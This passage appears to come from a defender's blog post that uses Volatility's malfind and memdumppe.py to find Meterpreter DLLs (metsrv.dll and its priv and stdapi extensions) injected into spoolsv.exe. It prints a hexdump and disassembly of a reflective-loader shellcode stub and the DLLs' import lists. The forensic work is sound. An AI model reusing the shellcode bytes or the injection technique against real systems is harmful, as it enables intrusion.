Raw data at address 0xdc0000: fc4889ce4881ec002000004883e4f0e8cc000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c

Disassembly:

0xdc0000 fc               CLD

0xdc0001 4889ce           MOV RSI, RCX

0xdc0004 4881ec00200000   SUB RSP, 0x2000

0xdc000b 4883e4f0         AND RSP, -0x10

0xdc000f e8cc000000       CALL 0xdc00e0

0xdc0014 4151             PUSH R9

0xdc0016 4150             PUSH R8

0xdc0018 52               PUSH RDX

0xdc0019 51               PUSH RCX

0xdc001a 56               PUSH RSI

0xdc001b 4831d2           XOR RDX, RDX

0xdc001e 65488b5260       MOV RDX, [GS:RDX+0x60]

0xdc0023 488b5218         MOV RDX, [RDX+0x18]

0xdc0027 488b5220         MOV RDX, [RDX+0x20]

0xdc002b 488b7250         MOV RSI, [RDX+0x50]

0xdc002f 480fb74a4a       MOVZX RCX, WORD [RDX+0x4a]

0xdc0034 4d31c9           XOR R9, R9

0xdc0037 4831c0           XOR RAX, RAX

0xdc003a ac               LODSB

0xdc003b 3c61             CMP AL, 0x61

0xdc003d 7c02             JL 0xdc0041

0xdc003f 2c               DB 0x2c

Hexdump:

0x00dc0000  fc 48 89 ce 48 81 ec 00 20 00 00 48 83 e4 f0 e8   .H..H......H....

0x00dc0010  cc 00 00 00 41 51 41 50 52 51 56 48 31 d2 65 48   ....AQAPRQVH1.eH

0x00dc0020  8b 52 60 48 8b 52 18 48 8b 52 20 48 8b 72 50 48   .R`H.R.H.R.H.rPH

0x00dc0030  0f b7 4a 4a 4d 31 c9 48 31 c0 ac 3c 61 7c 02 2c   ..JJM1.H1..<a|.,

Process: spoolsv.exe, Pid: 1120

VadTag: VadS, Protection: PAGE_EXECUTE_READWRITE, Flags: PrivateMemory: 1, Protection: 6

Raw data at address 0xf093650000: 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000e8000000

Disassembly:

0xf093650000 4d5a             POP R10

0xf093650002 90               NOP

0xf093650003 0003             ADD [RBX], AL

0xf093650005 0000             ADD [RAX], AL

0xf093650007 000400           ADD [RAX+RAX], AL

0xf09365000a 0000             ADD [RAX], AL

0xf09365000c ff               DB 0xff

...

Above we see the same data as before, plus a disassembly and hexdump of 64 bytes of the suspect memory regions, note the use of the --dumpdir argument, which will create dump files containing the suspect memory ranges that can be analyzed further.

Triaging malfind's dumps

A capable reverse engineer would likely load malfind's dumps in something like IDA Pro and reach sound conclusions about the capabilities represented by the contents of these suspect memory regions. 

davehull@scrutiny:~/res/malfind_dump$ ls -la

total 2968

drwxrwxr-x 2 davehull davehull    4096 Jul 21 13:59 .

drwxrwxr-x 3 davehull davehull    4096 Jul 21 14:01 ..

-rw-rw-r-- 1 davehull davehull 1191935 Jul 19 21:39 process.0xfffffa8005138980.0xdc0000.dmp

-rw-rw-r-- 1 davehull davehull  155647 Jul 19 21:39 process.0xfffffa8005138980.0xf093650000.dmp

-rw-rw-r-- 1 davehull davehull  450559 Jul 19 21:39 process.0xfffffa8005138980.0xf093c70000.dmp

-rw-rw-r-- 1 davehull davehull 1232895 Jul 19 21:39 process.0xfffffa8005138980.0xf093d40000.dmp

davehull@scrutiny:~/res/malfind_dump$

I've never considered myself an expert at RE (or anything, really), but have dabbled on the edges. An easy place to start for quickly triaging is with the strings utility.

strings -a -t d process.0xfffffa8005138980.0xdc0000.dmp > process.0xfffffa8005138980.0xdc0000.dmp.strings

strings -a -t d -e l process.0xfffffa8005138980.0xdc0000.dmp >> process.0xfffffa8005138980.0xdc0000.dmp.strings

The above commands extract ASCII and Unicode strings from the first of malfind's dumps and include a first column indicating the number of bytes into the file where the given string begins, this can be useful if you want to examine the string in context.

cat process.0xfffffa8005138980.0xdc0000.dmp.strings | awk '{$1="";print}'| sort | uniq -c | sort -g > process.0xfffffa8005138980.0xdc0000.dmp.strings.lfo

And this command trims the first column, sorts the data, passes it to the uniq utility with the -c argument to get a count of the number of occurrences of the given string then passes this to the sort command again to sort the results by frequency of occurrence of the given string. This is done as a data reduction measure, cutting the number of strings by 1/3. We can further reduce this by grepping through the strings with a good wordlist.

cp /usr/share/dict/american-english .

strings american-english | grep -v "'" > american-english.1

strings -n4 american-english.1 > american-english

The steps above copy the system's American English dictionary to the current directory, then removes lines from it containing apostrophes and then trims out words of less than four characters. Now that we have a reasonably good list of words, we can grep through our strings output for matches:

grep -iFf american-english process.0xfffffa8005138980.0xdc0000.dmp.strings.lfo > process.0xfffffa8005138980.0xdc0000.dmp.strings.lfo.words

Again, this is purely about data reduction. After this step, we're down to less than 4K words from nearly 17K strings at the start:

davehull@scrutiny:~/res/malfind_dump$ wc -l *strings*

 16942 process.0xfffffa8005138980.0xdc0000.dmp.strings

  8540 process.0xfffffa8005138980.0xdc0000.dmp.strings.lfo

  3797 process.0xfffffa8005138980.0xdc0000.dmp.strings.lfo.words

Here are a few interesting strings from the .words file:

davehull@scrutiny:~/res/malfind_dump$ grep Create *.words

      1  CreateEventA

      1  CreateEventExW

      1  CreateFile2

      1  CreateFileA

      1  CreateFileW

      1  CreateMutexA

      1  CreateRemoteThread

      1  CreateSemaphoreExW

      1  CreateSymbolicLinkW

      1  CreateThread

      1  CreateThreadpoolTimer

      1  CreateThreadpoolWait

      1  NtCreateSection

      1  RtlCreateUserThread

      2  CreateToolhelp32Snapshot

davehull@scrutiny:~/res/malfind_dump$ grep Reflective *.words

      2  ReflectiveLoader

davehull@scrutiny:~/res/malfind_dump$ grep -i "\.dll" *.words

      1  CRYPT32.dll

      1  kernel32.dll

      1  KERNEL32.dll

      1  USER32.dll

      1  WININET.dll

Above are what appear to be function names and the names of some dlls, which may be imported. There are many strings related to SSL and TLS (not shown). Alas our use of strings is akin to groping around in the dark. We could proceed this way through the other files, but there are better tools for the job.

The prolific producer of prodigious probing programs, Willi Ballenthin, has written a wrapper around Vivisect that can extract certain features from memory dumped PE files. Here's what memdumppe.py produces against the first dump:

davehull@scrutiny:~/res/malfind_dump$ memdumppe.py process.0xfffffa8005138980.0xdc0000.dmp 0 

Traceback (most recent call last):

  File "/home/davehull/bin/memdumppe.py", line 280, in <module>

    sys.exit(main())

  File "/home/davehull/bin/memdumppe.py", line 265, in main

    pe = PE.PE(fv, inmem=guess_is_memory_image(fv))

  File "/home/davehull/.local/lib/python2.7/site-packages/PE/__init__.py", line 377, in __init__

    "pe.IMAGE_NT_HEADERS")

  File "/home/davehull/.local/lib/python2.7/site-packages/PE/__init__.py", line 481, in readStructAtOffset

    sbytes = self.readAtOffset(offset, len(s))

  File "/home/davehull/.local/lib/python2.7/site-packages/PE/__init__.py", line 659, in readAtOffset

    self.fd.seek(offset)

  File "/home/davehull/bin/memdumppe.py", line 117, in seek

    raise IOError('cant read offset %d (overrun)' % (final_offset - self.start))

IOError: cant read offset 738360417 (overrun)

Not entirely useful. Let's take a look at the file using xxd:

davehull@scrutiny:~/res/malfind_dump$ xxd process.0xfffffa8005138980.0xdc0000.dmp

00000000: fc48 89ce 4881 ec00 2000 0048 83e4 f0e8  .H..H... ..H....

00000010: cc00 0000 4151 4150 5251 5648 31d2 6548  ....AQAPRQVH1.eH

00000020: 8b52 6048 8b52 1848 8b52 2048 8b72 5048  .R`H.R.H.R H.rPH

00000030: 0fb7 4a4a 4d31 c948 31c0 ac3c 617c 022c  ..JJM1.H1..<a|.,

00000040: 2041 c1c9 0d41 01c1 e2ed 5241 5148 8b52   A...A....RAQH.R

00000050: 208b 423c 4801 d066 8178 180b 020f 8572   .B<H..f.x.....r

00000060: 0000 008b 8088 0000 0048 85c0 7467 4801  .........H..tgH.

00000070: d050 8b48 1844 8b40 2049 01d0 e356 48ff  .P.H.D.@ I...VH.

00000080: c941 8b34 8848 01d6 4d31 c948 31c0 ac41  .A.4.H..M1.H1..A

00000090: c1c9 0d41 01c1 38e0 75f1 4c03 4c24 0845  ...A..8.u.L.L$.E

000000a0: 39d1 75d8 5844 8b40 2449 01d0 6641 8b0c  9.u.XD.@$I..fA..

000000b0: 4844 8b40 1c49 01d0 418b 0488 4801 d041  HD.@.I..A...H..A

000000c0: 5841 585e 595a 4158 4159 415a 4883 ec20  XAX^YZAXAYAZH.. 

000000d0: 4152 ffe0 5841 595a 488b 12e9 4bff ffff  AR..XAYZH...K...

000000e0: 5d48 8b0e 41ba 1d9f 2635 ffd5 ff56 0870  ]H..A...&5...V.p

000000f0: 0500 0000 0000 00ff 00dc 0000 0000 004d  ...............M

00000100: 5a41 5255 4889 e548 83ec 20e8 0000 0000  ZARUH..H.. .....

00000110: 5b48 81c3 af1e 0000 ffd3 4881 c340 0312  [H........H..@..

00000120: 0089 3b49 89d8 6a04 5aff d000 0000 0000  ..;I..j.Z.......

00000130: 0000 0000 0000 0000 0000 0000 0100 000e  ................

00000140: 1fba 0e00 b409 cd21 b801 4ccd 2154 6869  .......!..L.!Thi

00000150: 7320 7072 6f67 7261 6d20 6361 6e6e 6f74  s program cannot

00000160: 2062 6520 7275 6e20 696e 2044 4f53 206d   be run in DOS m

Note the presence of the MZ header at offset 0xFF. Ballenthin's memdumppe.py takes an offset to the MZ header as an argument. Above I passed 0 as that offset and memdumppe.py failed. Let's try again with the offset of 255:

davehull@scrutiny:~/res/malfind_dump$ memdumppe.py process.0xfffffa8005138980.0xdc0000.dmp 255 | more

timestamp: 2017-03-17T17:57:34+00:00

checksum: 0x12beb5

export name: metsrv.dll

exports:

  0) Init

  1) ReflectiveLoader

  2) buffer_from_file

  3) buffer_to_file

  4) channel_close

  5) channel_create

  6) channel_create_datagram

  7) channel_create_pool

  8) channel_create_stream

  9) channel_default_io_handler

  10) channel_destroy

  11) channel_exists

  12) channel_find_by_id

  13) channel_get_buffered_io_context

  14) channel_get_class

  15) channel_get_flags

  16) channel_get_id

  17) channel_get_native_io_context

  18) channel_get_type

  19) channel_interact

  20) channel_is_flag

  21) channel_is_interactive

  22) channel_open

  23) channel_read

  24) channel_read_from_buffered

  25) channel_set_buffered_io_handler

  26) channel_set_flags

  27) channel_set_interactive

  28) channel_set_native_io_context

  29) channel_set_type

  30) channel_write

  31) channel_write_to_buffered

  32) channel_write_to_remote

  33) command_deregister

  34) command_deregister_all

  35) command_handle

  36) command_join_threads

  37) command_register

  38) command_register_all

  39) core_update_desktop

  40) core_update_thread_token

  41) packet_add_completion_handler

  42) packet_add_exception

  43) packet_add_group

  44) packet_add_tlv_bool

  45) packet_add_tlv_group

  46) packet_add_tlv_qword

  47) packet_add_tlv_raw

  48) packet_add_tlv_string

  49) packet_add_tlv_uint

  50) packet_add_tlv_wstring

  51) packet_add_tlv_wstring_len

  52) packet_add_tlvs

  53) packet_call_completion_handlers

  54) packet_create

  55) packet_create_group

  56) packet_create_response

  57) packet_destroy

  58) packet_enum_tlv

  59) packet_get_tlv

  60) packet_get_tlv_group_entry

  61) packet_get_tlv_meta

  62) packet_get_tlv_string

  63) packet_get_tlv_value_bool

  64) packet_get_tlv_value_qword

  65) packet_get_tlv_value_raw

  66) packet_get_tlv_value_string

  67) packet_get_tlv_value_uint

  68) packet_get_tlv_value_wstring

  69) packet_get_type

  70) packet_is_tlv_null_terminated

  71) packet_remove_completion_handler

  72) packet_transmit_empty_response

  73) packet_transmit_response

  74) scheduler_destroy

  75) scheduler_initialize

  76) scheduler_insert_waitable

  77) scheduler_signal_waitable

  78) scheduler_waitable_thread

imports:

  - WS2_32.dll.ntohl

  - WS2_32.dll.connect

  - WS2_32.dll.htonl

  - WS2_32.dll.htons

  - WS2_32.dll.inet_addr

  - WS2_32.dll.inet_ntoa

  - WS2_32.dll.listen

  - WS2_32.dll.send

  - WS2_32.dll.WSADuplicateSocketA

  - WS2_32.dll.WSAGetLastError

  - WS2_32.dll.WSASetLastError

  - WS2_32.dll.WSAStartup

  - WS2_32.dll.getservbyname

  - WS2_32.dll.getservbyport

  - WS2_32.dll.gethostbyname

  - WS2_32.dll.gethostbyaddr

  - WS2_32.dll.socket

  - WS2_32.dll.setsockopt

  - WS2_32.dll.select

  - WS2_32.dll.recv

  - WS2_32.dll.ntohs

  - WS2_32.dll.shutdown

  - WS2_32.dll.closesocket

  - WS2_32.dll.bind

  - WS2_32.dll.accept

  - CRYPT32.dll.CertGetCertificateContextProperty

  - WININET.dll.HttpQueryInfoW

  - WININET.dll.InternetOpenW

  - WININET.dll.InternetCloseHandle

  - WININET.dll.InternetConnectW

  - WININET.dll.InternetReadFile

  - WININET.dll.InternetSetOptionW

  - WININET.dll.HttpOpenRequestW

  - WININET.dll.HttpSendRequestW

  - WININET.dll.InternetCrackUrlW

  - WINHTTP.dll.WinHttpOpenRequest

  - WINHTTP.dll.WinHttpReadData

  - WINHTTP.dll.WinHttpConnect

  - WINHTTP.dll.WinHttpCloseHandle

  - WINHTTP.dll.WinHttpCrackUrl

  - WINHTTP.dll.WinHttpSetOption

  - WINHTTP.dll.WinHttpQueryOption

  - WINHTTP.dll.WinHttpOpen

  - WINHTTP.dll.WinHttpGetIEProxyConfigForCurrentUser

  - WINHTTP.dll.WinHttpGetProxyForUrl

  - WINHTTP.dll.WinHttpQueryHeaders

  - WINHTTP.dll.WinHttpReceiveResponse

  - WINHTTP.dll.WinHttpSendRequest

  - KERNEL32.dll.CompareStringW

  - KERNEL32.dll.GetStringTypeW

  - KERNEL32.dll.CreateFileW

  - KERNEL32.dll.LoadLibraryExW

  - KERNEL32.dll.OutputDebugStringW

  - KERNEL32.dll.FileTimeToSystemTime

  - KERNEL32.dll.SystemTimeToTzSpecificLocalTime

  - KERNEL32.dll.GetDriveTypeW

  - KERNEL32.dll.FindFirstFileExW

  - KERNEL32.dll.SetStdHandle

  - KERNEL32.dll.SetFilePointerEx

  - KERNEL32.dll.ReadConsoleW

  - KERNEL32.dll.GetConsoleCP

  - KERNEL32.dll.FlushFileBuffers

  - KERNEL32.dll.TlsFree

  - KERNEL32.dll.TlsSetValue

  - KERNEL32.dll.TlsGetValue

  - KERNEL32.dll.TlsAlloc

  - KERNEL32.dll.TerminateProcess

  - KERNEL32.dll.GetProcAddress

  - KERNEL32.dll.FlushInstructionCache

  - KERNEL32.dll.VirtualAlloc

  - KERNEL32.dll.VirtualFree

  - KERNEL32.dll.VirtualProtect

  - KERNEL32.dll.VirtualQuery

  - KERNEL32.dll.WriteProcessMemory

  - KERNEL32.dll.LCMapStringW

  - KERNEL32.dll.LoadLibraryW

  - KERNEL32.dll.GetModuleHandleA

  - KERNEL32.dll.ExitProcess

  - KERNEL32.dll.SetUnhandledExceptionFilter

  - KERNEL32.dll.ExitThread

  - KERNEL32.dll.GetLastError

  - KERNEL32.dll.GetSystemDirectoryW

  - KERNEL32.dll.GetVolumeInformationW

  - KERNEL32.dll.GetComputerNameW

  - KERNEL32.dll.FreeLibrary

  - KERNEL32.dll.GetCurrentProcess

  - KERNEL32.dll.GetCurrentProcessId

  - KERNEL32.dll.GetCurrentThreadId

  - KERNEL32.dll.SetLastError

  - KERNEL32.dll.GetModuleHandleW

  - KERNEL32.dll.SetHandleInformation

  - KERNEL32.dll.GetSystemDirectoryA

  - KERNEL32.dll.GlobalFree

  - KERNEL32.dll.Sleep

  - KERNEL32.dll.GetStdHandle

  - KERNEL32.dll.GetFileType

  - KERNEL32.dll.MultiByteToWideChar

  - KERNEL32.dll.FindClose

  - KERNEL32.dll.WideCharToMultiByte

  - KERNEL32.dll.CloseHandle

  - KERNEL32.dll.QueryPerformanceCounter

  - KERNEL32.dll.GetTickCount

  - KERNEL32.dll.GlobalMemoryStatus

  - KERNEL32.dll.FlushConsoleInputBuffer

  - KERNEL32.dll.InitializeCriticalSectionAndSpinCount

  - KERNEL32.dll.UnhandledExceptionFilter

  - KERNEL32.dll.RtlVirtualUnwind

  - KERNEL32.dll.RtlLookupFunctionEntry

  - KERNEL32.dll.RtlCaptureContext

  - KERNEL32.dll.FreeEnvironmentStringsW

  - KERNEL32.dll.SetEnvironmentVariableA

  - KERNEL32.dll.FileTimeToLocalFileTime

  - KERNEL32.dll.GetFileInformationByHandle

  - KERNEL32.dll.PeekNamedPipe

  - KERNEL32.dll.GetFullPathNameW

  - KERNEL32.dll.GetCurrentDirectoryW

  - KERNEL32.dll.HeapSize

  - KERNEL32.dll.SetEndOfFile

  - KERNEL32.dll.LoadLibraryA

  - KERNEL32.dll.GetFileSize

  - KERNEL32.dll.GetEnvironmentStringsW

  - KERNEL32.dll.GetModuleFileNameA

  - KERNEL32.dll.GetStartupInfoW

  - KERNEL32.dll.DeleteCriticalSection

  - KERNEL32.dll.GetCPInfo

  - KERNEL32.dll.GetOEMCP

  - KERNEL32.dll.GetACP

  - KERNEL32.dll.IsValidCodePage

  - KERNEL32.dll.WriteFile

  - KERNEL32.dll.ReadFile

  - KERNEL32.dll.CreateFileA

  - KERNEL32.dll.CreateThread

  - KERNEL32.dll.TerminateThread

  - KERNEL32.dll.ResumeThread

  - KERNEL32.dll.SetEvent

  - KERNEL32.dll.ReleaseMutex

  - KERNEL32.dll.WaitForSingleObject

  - KERNEL32.dll.CreateMutexA

  - KERNEL32.dll.CreateEventA

  - KERNEL32.dll.WaitForMultipleObjects

  - KERNEL32.dll.GetSystemTime

  - KERNEL32.dll.SystemTimeToFileTime

  - KERNEL32.dll.VirtualAllocEx

  - KERNEL32.dll.OpenProcess

  - KERNEL32.dll.DuplicateHandle

  - KERNEL32.dll.OpenThread

  - KERNEL32.dll.SuspendThread

  - KERNEL32.dll.GetVersionExA

  - KERNEL32.dll.CreateToolhelp32Snapshot

  - KERNEL32.dll.Thread32First

  - KERNEL32.dll.Thread32Next

  - KERNEL32.dll.CreateRemoteThread

  - KERNEL32.dll.GetThreadId

  - KERNEL32.dll.HeapFree

  - KERNEL32.dll.HeapAlloc

  - KERNEL32.dll.HeapReAlloc

  - KERNEL32.dll.GetSystemTimeAsFileTime

  - KERNEL32.dll.RtlUnwindEx

  - KERNEL32.dll.GetCommandLineA

  - KERNEL32.dll.EnterCriticalSection

  - KERNEL32.dll.LeaveCriticalSection

  - KERNEL32.dll.GetTimeZoneInformation

  - KERNEL32.dll.IsProcessorFeaturePresent

  - KERNEL32.dll.IsDebuggerPresent

  - KERNEL32.dll.GetModuleFileNameW

  - KERNEL32.dll.GetModuleHandleExW

  - KERNEL32.dll.WriteConsoleW

  - KERNEL32.dll.EncodePointer

  - KERNEL32.dll.DecodePointer

  - KERNEL32.dll.SetConsoleCtrlHandler

  - KERNEL32.dll.GetConsoleMode

  - KERNEL32.dll.ReadConsoleInputA

  - KERNEL32.dll.SetConsoleMode

  - KERNEL32.dll.GetProcessHeap

  - KERNEL32.dll.AreFileApisANSI

  - USER32.dll.GetThreadDesktop

  - USER32.dll.GetUserObjectInformationW

  - USER32.dll.MessageBoxW

  - USER32.dll.GetDesktopWindow

  - USER32.dll.GetProcessWindowStation

  - ADVAPI32.dll.ReportEventW

  - ADVAPI32.dll.AdjustTokenPrivileges

  - ADVAPI32.dll.ImpersonateLoggedOnUser

  - ADVAPI32.dll.LookupPrivilegeValueA

  - ADVAPI32.dll.RegisterEventSourceW

  - ADVAPI32.dll.DeregisterEventSource

  - ADVAPI32.dll.OpenThreadToken

  - ADVAPI32.dll.OpenProcessToken

sections:

  - .text

    virtual address: 0x1000     size: 0xb3ac4

    raw address:     0x400      size: 0xb3c00

  - .rdata

    virtual address: 0xb5000    size: 0x4019e

    raw address:     0xb4000    size: 0x40200

  - .data

    virtual address: 0xf6000    size: 0x25ad0

    raw address:     0xf4200    size: 0x1e600

  - .pdata

    virtual address: 0x11c000   size: 0xa02c

    raw address:     0x112800   size: 0xa200

  - .reloc

    virtual address: 0x127000   size: 0x571c

    raw address:     0x11ca00   size: 0x5800

imphash: 5df789b340bdc9056bbdeb6485e684b1

Beautiful! We've got the name of the dll, metsrv.dll, its exports and imports. If we extract the dlls from the imports, we get:

ADVAPI32.dll

CRYPT32.dll

KERNEL32.dll

USER32.dll

WINHTTP.dll

WININET.dll

WS2_32.dll

Of these, WINHTTP.dll and WININET.dll are both in the list of late loaded dlls into spoolsv.exe.

What of the others? Let's check the other dumps.

davehull@scrutiny:~/res/malfind_dump$ memdumppe.py process.0xfffffa8005138980.0xf093d40000.dmp 0

imestamp: 2017-03-17T17:57:34+00:00

checksum: 0x12beb5

export name: metsrv.dll

exports:

  0) Init

  1) ReflectiveLoader

...

imphash: 5df789b340bdc9056bbdeb6485e684b1

This dump matches the other and gives us no new information. Next:

davehull@scrutiny:~/res/malfind_dump$ memdumppe.py process.0xfffffa8005138980.0xf093650000.dmp 0

timestamp: 2017-03-17T17:57:37+00:00

checksum: 0x21c86

export name: ext_server_priv.x64.dll

exports:

  0) DeinitServerExtension

  1) GetExtensionName

  2) InitServerExtension

  3) ReflectiveLoader

  4) control

imports:

  - PSAPI.DLL.GetModuleBaseNameA

  - PSAPI.DLL.EnumProcesses

  - KERNEL32.dll.WaitForSingleObject...

  - ADVAPI32.dll.DuplicateToken...

imphash: ffef24858578d3574c5d32e8809de379

Above we have a few more bits of information and much redacted for the sake of space, the name of another injected dll -- ext_server_priv.x64.dll -- and a new imported dll that belongs to the list of late loaded dlls in spoolsv.exe, PSAPI.DLL.

Let's dump the last one:

davehull@scrutiny:~/res/malfind_dump$ memdumppe.py process.0xfffffa8005138980.0xf093c70000.dmp 0

timestamp: 2017-03-17T17:57:53+00:00

checksum: 0x6fb3b

export name: ext_server_stdapi.x64.dll

exports:

  0) DeinitServerExtension

  1) GetExtensionName

  2) InitServerExtension

  3) ReflectiveLoader

imports:

  - PSAPI.DLL.GetDeviceDriverBaseNameW...

  - WINMM.dll.waveInAddBuffer...

  - IPHLPAPI.DLL.GetIpNetTable...

  - SHLWAPI.dll.SHDeleteKeyW

  - WS2_32.dll.accept...

  - KERNEL32.dll.GetModuleFileNameA...

  - USER32.dll.SwitchDesktop...

  - ADVAPI32.dll.ImpersonateLoggedOnUser...

  - ole32.dll.CoCreateInstance...

  - OLEAUT32.dll.VariantClear...

  - MPR.dll.WNetGetUniversalNameA

  - NETAPI32.dll.NetWkstaGetInfo

sections:

  - .text...

imphash: 204d5fb9d32a5334c03d70887f17e301

Another new dll, ext_server_stdapi.x64.dll along with its exports and a redacted list of imports. These imports nearly round out the list of late loaded dlls found in spoolsv.exe., I believe only wkscli.dll is missing.

What are the takeaways?

Attackers are crafty and have been for a long time. This post presents the visible part of the ice berg. There are other ways to inject malicious code into legitimate processes. Some of these may not lend themselves to easy discovery, some may. It's incumbent upon as as defenders, hunters, investigators and insatiably curious types to test and testify to our test results.

Fortunately, though attackers be sneaky and creative, diligent defenders can build detections around late loading dlls or hunt for specific sets of dlls associated with malicious agent migrations.

In future posts, I'd like to explore Truncer's framework and see if Volatility can pull back its veil. That was bad. I'm sorry. I'd also like to dive in deeper on the byte array and explain what's happening there.

I want to encourage you to take a look at memtriage. I don't hear much chatter about it, but I think it's a game changer enabling more rapid response.

Next Up: Amateur hour analysis of the shellcode shown above